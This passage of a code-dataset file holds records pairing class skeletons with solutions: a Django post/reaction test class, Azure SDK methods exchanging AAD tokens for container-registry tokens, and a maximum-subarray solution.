ReactionFactory.create_batch(count, post=post, description=reaction)\n self.assertEqual(post.get_reaction_counter(), [(Reaction.IMAGE_URLS[reaction], count) for reaction, count in reactions.items()])\n<|end_body_1|>\n", "revision_id": "4089c3f084d7460f64517158eefb54b3b93a01e8", "skeleton": "<|skeleton|>\nclass TestPost:\n\n def test_add_comment(self):\n \"\"\"Test adding comment to post\"\"\"\n <|body_0|>\n\n def test_get_reaction_count(self):\n \"\"\"Test function return correct urls with count\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestPost:\n def test_add_comment(self):\n \"\"\"Test adding comment to post\"\"\"\n post = PostFactory()\n comment = PostFactory()\n post.add_comment(comment)\n self.assertEqual(comment.title, post.title)\n self.assertTrue(comment.is_comment)\n self.assertEqual(comment.parent_post, post)\n\n def test_get_reaction_count(self):\n \"\"\"Test function return correct urls with count\"\"\"\n post = PostFactory()\n reactions = {Reaction.ANGRY: 3, Reaction.LIKE: 2}\n for reaction, count in reactions.items():\n ReactionFactory.create_batch(count, post=post, description=reaction)\n self.assertEqual(post.get_reaction_counter(), [(Reaction.IMAGE_URLS[reaction], count) for reaction, count in reactions.items()])\n", "source": "the_stack_v2_python_sparse", "source_path": "apps/posts/tests.py", "source_repo": "maxwell912/social-app", "split": "test", "star_events_count": 0} {"blob_id": "a93d2d689109b36239173c0104826ff19bb3c541", "bodies": ["error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\nerror_map.update(kwargs.pop('error_map', {}) or {})\n_headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n_params = case_insensitive_dict(kwargs.pop('params', {}) or {})\napi_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\ncontent_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\ncls = kwargs.pop('cls', None)\n_data = {'grant_type': grant_type, 'service': service, 'tenant': tenant, 'refresh_token': refresh_token, 'access_token': access_token}\nrequest = build_exchange_aad_access_token_for_acr_refresh_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\npath_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\nrequest.url = self._client.format_url(request.url, **path_format_arguments)\npipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\nresponse = pipeline_response.http_response\nif response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\ndeserialized = self._deserialize('AcrRefreshToken', pipeline_response)\nif cls:\n return cls(pipeline_response, deserialized, {})\nreturn deserialized", "error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\nerror_map.update(kwargs.pop('error_map', {}) or {})\n_headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n_params = case_insensitive_dict(kwargs.pop('params', {}) or {})\napi_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\ncontent_type = 
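TestPost.test_get_reaction_count above expects get_reaction_counter() to return (image_url, count) pairs, one per reaction type. A plain-Python sketch of that aggregation using collections.Counter; IMAGE_URLS is mocked as a simple dict here, whereas in the record it lives on the Django Reaction model:

# Plain sketch of the aggregation TestPost.test_get_reaction_count verifies:
# per-reaction counts mapped to (image_url, count) pairs. IMAGE_URLS is a
# mocked mapping standing in for Reaction.IMAGE_URLS.
from collections import Counter

IMAGE_URLS = {'angry': '/static/angry.png', 'like': '/static/like.png'}


def get_reaction_counter(reaction_names):
    counts = Counter(reaction_names)   # preserves first-seen order (3.7+)
    return [(IMAGE_URLS[name], count) for name, count in counts.items()]


reactions = ['angry', 'angry', 'angry', 'like', 'like']
assert get_reaction_counter(reactions) == [
    ('/static/angry.png', 3),
    ('/static/like.png', 2),
]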
kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\ncls = kwargs.pop('cls', None)\n_data = {'service': service, 'scope': scope, 'refresh_token': refresh_token, 'grant_type': grant_type}\nrequest = build_exchange_acr_refresh_token_for_acr_access_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\npath_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\nrequest.url = self._client.format_url(request.url, **path_format_arguments)\npipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\nresponse = pipeline_response.http_response\nif response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\ndeserialized = self._deserialize('AcrAccessToken', pipeline_response)\nif cls:\n return cls(pipeline_response, deserialized, {})\nreturn deserialized"], "bodies_text": "<|body_start_0|>\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'grant_type': grant_type, 'service': service, 'tenant': tenant, 'refresh_token': refresh_token, 'access_token': access_token}\n request = build_exchange_aad_access_token_for_acr_refresh_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrRefreshToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n<|end_body_0|>\n\n<|body_start_1|>\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'service': service, 'scope': scope, 'refresh_token': refresh_token, 'grant_type': grant_type}\n request = build_exchange_acr_refresh_token_for_acr_access_token_request(api_version=api_version, content_type=content_type, data=_data, 
headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrAccessToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n<|end_body_1|>\n", "class_docstring": "", "class_name": "AuthenticationOperations", "detected_licenses": ["LicenseRef-scancode-generic-cla", "MIT", "LGPL-2.1-or-later"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AuthenticationOperations:\n\n async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken:\n \"\"\"Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default\"\"\"\n <|body_0|>\n\n async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken:\n \"\"\"Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". 
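The AuthenticationOperations methods implement the two-step ACR token dance the docstrings describe: first exchange an AAD access token for an ACR refresh token, then exchange that refresh token plus a scope (taken from the registry's Www-Authenticate challenge) for an ACR access token. A sketch of the same two form-encoded POSTs using the third-party requests library; the field names mirror the record's _data dicts, while the registry host is a placeholder and the /oauth2/exchange and /oauth2/token paths are the publicly documented ACR routes, so treat the whole thing as illustrative rather than as this SDK's implementation:

# Sketch of the two-step ACR token exchange performed by the record's
# methods, as plain HTTP. Field names mirror the record's form data;
# REGISTRY and aad_token are placeholders, and error handling is reduced
# to raise_for_status().
import requests

REGISTRY = 'myregistry.azurecr.io'   # placeholder registry host


def get_acr_access_token(aad_token: str, scope: str) -> str:
    # Step 1: AAD access token -> ACR refresh token (grant_type=access_token).
    r = requests.post(
        f'https://{REGISTRY}/oauth2/exchange',
        data={'grant_type': 'access_token', 'service': REGISTRY,
              'access_token': aad_token},
    )
    r.raise_for_status()
    refresh_token = r.json()['refresh_token']

    # Step 2: ACR refresh token + scope -> ACR access token.
    r = requests.post(
        f'https://{REGISTRY}/oauth2/token',
        data={'grant_type': 'refresh_token', 'service': REGISTRY,
              'scope': scope, 'refresh_token': refresh_token},
    )
    r.raise_for_status()
    return r.json()['access_token']


# Example scope, as it would appear in a Www-Authenticate challenge:
# get_acr_access_token(aad_token, 'repository:hello-world:pull')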
:type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'grant_type': grant_type, 'service': service, 'tenant': tenant, 'refresh_token': refresh_token, 'access_token': access_token}\n request = build_exchange_aad_access_token_for_acr_refresh_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrRefreshToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n<|end_body_0|>\n\n<|body_start_1|>\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'service': service, 'scope': scope, 'refresh_token': refresh_token, 'grant_type': grant_type}\n request = build_exchange_acr_refresh_token_for_acr_access_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrAccessToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000098", "length_bytes": 8679, "license_type": "permissive", "methods": [{"docstring": "Exchange AAD tokens 
for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default", "name": "exchange_aad_access_token_for_acr_refresh_token", "signature": "async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken"}, {"docstring": "Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". :type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A", "name": "exchange_acr_refresh_token_for_acr_access_token", "signature": "async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007292", "prompt": "Implement the Python class `AuthenticationOperations` described below.\n\nClass description:\nImplement the AuthenticationOperations class.\n\nMethod signatures and docstrings:\n- async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken: Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. 
Default\n- async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken: Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". :type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A", "prompted_full_text": "Implement the Python class `AuthenticationOperations` described below.\n\nClass description:\nImplement the AuthenticationOperations class.\n\nMethod signatures and docstrings:\n- async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken: Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default\n- async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken: Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". :type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A\n\n<|skeleton|>\nclass AuthenticationOperations:\n\n async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken:\n \"\"\"Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. 
:type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default\"\"\"\n <|body_0|>\n\n async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken:\n \"\"\"Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". :type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'grant_type': grant_type, 'service': service, 'tenant': tenant, 'refresh_token': refresh_token, 'access_token': access_token}\n request = build_exchange_aad_access_token_for_acr_refresh_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrRefreshToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n<|end_body_0|>\n\n<|body_start_1|>\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n 
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'service': service, 'scope': scope, 'refresh_token': refresh_token, 'grant_type': grant_type}\n request = build_exchange_acr_refresh_token_for_acr_access_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrAccessToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n<|end_body_1|>\n", "revision_id": "c2ca191e736bb06bfbbbc9493e8325763ba990bb", "skeleton": "<|skeleton|>\nclass AuthenticationOperations:\n\n async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken:\n \"\"\"Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default\"\"\"\n <|body_0|>\n\n async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken:\n \"\"\"Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". 
:type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AuthenticationOperations:\n async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken:\n \"\"\"Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default\"\"\"\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'grant_type': grant_type, 'service': service, 'tenant': tenant, 'refresh_token': refresh_token, 'access_token': access_token}\n request = build_exchange_aad_access_token_for_acr_refresh_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrRefreshToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n\n async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken:\n \"\"\"Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. 
:type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". :type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A\"\"\"\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'service': service, 'scope': scope, 'refresh_token': refresh_token, 'grant_type': grant_type}\n request = build_exchange_acr_refresh_token_for_acr_access_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrAccessToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n", "source": "the_stack_v2_python_sparse", "source_path": "sdk/containerregistry/azure-containerregistry/azure/containerregistry/_generated/aio/operations/_patch.py", "source_repo": "Azure/azure-sdk-for-python", "split": "test", "star_events_count": 4046} {"blob_id": "4328facf43ff7495b3105a47072a7a493f829876", "bodies": ["sum = nums[0]\nmax_sum = nums[0]\nfor i in range(1, len(nums)):\n if sum < 0:\n sum = 0\n sum += nums[i]\n max_sum = max(sum, max_sum)\nreturn max_sum", "for i in range(1, len(nums)):\n if nums[i - 1] > 0:\n nums[i] += nums[i - 1]\nreturn max(nums)"], "bodies_text": "<|body_start_0|>\n sum = nums[0]\n max_sum = nums[0]\n for i in range(1, len(nums)):\n if sum < 0:\n sum = 0\n sum += nums[i]\n max_sum = max(sum, max_sum)\n return max_sum\n<|end_body_0|>\n\n<|body_start_1|>\n for i in range(1, len(nums)):\n if nums[i - 1] > 0:\n nums[i] += nums[i - 1]\n return max(nums)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxSubArray(self, nums):\n \"\"\"The sublist with the maximum sum :type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxSubArray2(self, nums):\n \"\"\"The sublist with the maximum sum :type nums: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sum = nums[0]\n max_sum = nums[0]\n for i in range(1, len(nums)):\n if sum < 0:\n sum = 0\n sum += nums[i]\n max_sum = max(sum, max_sum)\n return max_sum\n<|end_body_0|>\n\n<|body_start_1|>\n for i in range(1, len(nums)):\n if nums[i - 1] > 0:\n nums[i] += nums[i - 1]\n return 
